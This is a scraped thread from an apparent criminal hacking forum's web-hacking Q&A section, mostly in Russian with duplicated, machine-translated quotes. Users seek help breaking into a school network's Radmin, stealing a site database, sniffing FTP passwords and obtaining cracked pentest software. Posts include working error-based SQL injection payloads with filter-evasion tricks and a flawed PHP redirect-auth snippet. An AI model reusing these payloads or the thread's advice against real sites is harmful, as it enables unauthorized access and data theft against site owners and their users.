Приветствую! Подскажите, как я могу достать username сервисов ssh, telnet, ftp, mssql, postgresql, pop3 без использования брута по словарям? Допустим для smtp знаю есть скрипт nse для nmap smtp-enum-users.nse. Есть способы также реализовать user enumeration без брута для прочих перечисленных сервисов? Подскажите, где могу покопаться?
-
XSS.stack #1 – первый литературный журнал от юзеров форума
[web-hacking] Ваши вопросы
- Автор темы .Slip
- Дата начала
-
- Теги
- web-hacking
[QUOTE = "ar4ayo, post: 89262, member: 7334"]
there is a radmin on the server! Is it possible to somehow bypass / break login and password? can I get for example in the school network?
[/ QUOTE]
Y
there is a radmin on the server! Is it possible to somehow bypass / break login and password? can I get for example in the school network?
[/ QUOTE]
Y
[QUOTE = "WareZxZ, post: 91229, member: 7274"]
I am not special, therefore I asked.
[/ QUOTE]
fir
I am not special, therefore I asked.
[/ QUOTE]
fir
[QUOTE = "WareZxZ, post: 91016, member: 7274"]
How much is it possible to steal a database from a site on the DLE engine? well, let's say from version 6.0 up
[/ QUOTE]
6.0?
How much is it possible to steal a database from a site on the DLE engine? well, let's say from version 6.0 up
[/ QUOTE]
6.0?
[QUOTE = "Se613, post: 89571, member: 4369"]
ar4ayo
Google in hand, for radmin there is a brute force.
For lazy videos, there is even an achat.
[/ QUOTE]
y
ar4ayo
Google in hand, for radmin there is a brute force.
For lazy videos, there is even an achat.
[/ QUOTE]
y
Здравствуйте, Уважаемые форумчане!
При работе софта AppSpider очень большой процент нахождения линков с пометкой NoSQl.
Если полученную инфу подставлять в sqlmap то как правило ничего не крутит.
Пробовал с гитхаба https://github.com/codingo/NoSQLMap тоже глухо.
Так вот вопрос - как и главное чем раскрутить данный вид уязвимости и есть ли возможность автоматизации?
При работе софта AppSpider очень большой процент нахождения линков с пометкой NoSQl.
Если полученную инфу подставлять в sqlmap то как правило ничего не крутит.
Пробовал с гитхаба https://github.com/codingo/NoSQLMap тоже глухо.
Так вот вопрос - как и главное чем раскрутить данный вид уязвимости и есть ли возможность автоматизации?
Кто может поделиться кряком Core Impact.
Как скулмапом раскрутить такую скуль?
site.com/1'or(1,2)=(select*from(select(name_const(version(),1)),name_const(version(),1))a)and(1)='1/
site.com/1'or(ExtractValue(1,concat(0x3a,(select/**/2/**/from/**/),(user()))))--'
site.com/1'or(ExtractValue(1,concat(0x3a,(SELECT/**/TABLE_NAME/**/FROM/**/information_schema.TABLES),(user()))))--'
Не крутит.
Фильтруется пробел space2comment не помогает.
Выкидывает 403 страницу. Хотя руками все норм.
site.com/1'or(1,2)=(select*from(select(name_const(version(),1)),name_const(version(),1))a)and(1)='1/
site.com/1'or(ExtractValue(1,concat(0x3a,(select/**/2/**/from/**/),(user()))))--'
site.com/1'or(ExtractValue(1,concat(0x3a,(SELECT/**/TABLE_NAME/**/FROM/**/information_schema.TABLES),(user()))))--'
Не крутит.
Фильтруется пробел space2comment не помогает.
Выкидывает 403 страницу. Хотя руками все норм.
Последнее редактирование:
Если это ErrorBased, то проще руками раскрутить.
Варианты пробелов: %20, +, %09 ,%0а, %0b, %0с, %0d, /**/, %2B, (1)
Вектор ExtractValue вообще не нуждается в пробелах: extractvalue(1,concat(0x3b,(select(count(*))from(table)where(id=1))))
Хотя уверен, что проблема там не в пробелах.
Поп-Хлоп, можешь рассказать, что за трюк с редиректом при basic auth? ты как-то упоминал про него. может на рдоте была тема с обсуждением, но по-видимому я её прощёлкал 
Есть одна довольна смешная фитча, но не базик аутх. Если дашь слыь на комент мб подскажу.Поп-Хлоп, можешь рассказать, что за трюк с редиректом при basic auth? ты как-то упоминал про него. может на рдоте была тема с обсуждением, но по-видимому я её прощёлкал
Было бы тоже интересно узнать про basic авториз, точнее, что конкретно имеется ввиду )))Поп-Хлоп, можешь рассказать, что за трюк с редиректом при basic auth? ты как-то упоминал про него. может на рдоте была тема с обсуждением, но по-видимому я её прощёлкал
Эмм, по моему речь была про кривую авторизацию, типа:Поп-Хлоп, можешь рассказать, что за трюк с редиректом при basic auth? ты как-то упоминал про него. может на рдоте была тема с обсуждением, но по-видимому я её прощёлкал
Код:
if(!$loggedin){
header('Location: someotherpage.php')
}всем сап
тема такая, знаю, что FTP это очень дырявая штука и даже если сервер защищен, то логин/пас передается в открытом виде через запрос. Вопрос такой, как поймать запрос и вынуть оттуда логин/пас
тема такая, знаю, что FTP это очень дырявая штука и даже если сервер защищен, то логин/пас передается в открытом виде через запрос. Вопрос такой, как поймать запрос и вынуть оттуда логин/пас
Это классика. Если у бурпе такое проверять, то можно вообще прозевать этот момент. А так есть плагин NoRedirect. Кстати, штук 6 таких сайтов видел.
Снифирить трафик
подскажите хорошие курсы по ИБ или хакингу
Здравствуйте, уважаемые форумчане. Нашёл дырку в сайте, при вводе sha-1 хэша можно получить доступ к аккаунту.
Как можно этим воспользоваться?
Стоит ли писать свой собственный хэш , по типу брута,который будет выдавать рандом хэши и пытаться зайти или это пустая трата времени?
Благодарю за внимание.
Как можно этим воспользоваться?
Стоит ли писать свой собственный хэш , по типу брута,который будет выдавать рандом хэши и пытаться зайти или это пустая трата времени?
Благодарю за внимание.
Дайте пожалуйста ответы на вопросы по onion.
http://xssforum7mmh3n56inuf2h73hvhnzobi7h2ytb3gvklrfqm7ut3xdnyd.onion/threads/40273
Приветствую, недавно пришёл на ваш форум и решил что стоило бы научиться находить/раскручивать уязвимости в web приложениях, серверах и т.п, но, к сожалению, я полный ноль в этой теме(максимум что делал это SqlDumper-ом крякнутым пользовался года три назад) и хочу спросить, с чего начать мое обучение? Может есть какие-то пошаговые гайды?(Было бы замечательно если бы вы дали на них ссылку) Заранее спасибо!